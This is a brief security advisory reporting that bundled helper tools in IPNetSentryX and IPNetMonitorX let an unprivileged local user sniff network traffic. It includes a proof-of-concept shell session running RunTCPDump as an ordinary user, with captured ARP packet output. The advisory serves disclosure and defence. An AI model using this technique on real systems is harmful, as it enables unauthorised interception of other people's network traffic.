source: https://www.securityfocus.com/bid/8365/info It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance. bash-2.05a$ id uid=503(dummy) gid=20(staff) groups=20(staff) bash-2.05a$ pwd /Applications/IPNetSentryX.app/Contents/Resources bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096 RunTCPDump: listening on en1 18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1 0001 0800 0604 0001 XXXX XXXX XXXX XXXX 0001 0000 0000 0000 c0a8 0001 0000 0000 0000 0000 0000 0000 0000 0000 0000